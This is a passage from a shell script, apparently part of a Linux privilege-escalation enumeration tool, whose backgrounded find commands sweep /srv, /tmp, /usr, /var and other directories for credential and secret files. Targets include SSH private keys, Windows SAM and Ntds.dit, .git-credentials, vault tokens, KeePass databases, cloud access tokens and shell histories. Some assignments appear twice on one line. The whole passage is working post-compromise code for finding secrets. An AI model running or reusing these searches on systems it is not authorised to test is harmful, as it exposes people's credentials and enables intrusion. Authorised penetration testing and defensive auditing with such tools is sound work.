-o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SRV=`eval_bckgrd "find /srv -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_TMP=`eval_bckgrd "find /tmp -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_TMP=`eval_bckgrd "find /tmp -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_USR=`eval_bckgrd "find /usr -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_USR=`eval_bckgrd "find /usr -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_VAR=`eval_bckgrd "find /var -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o 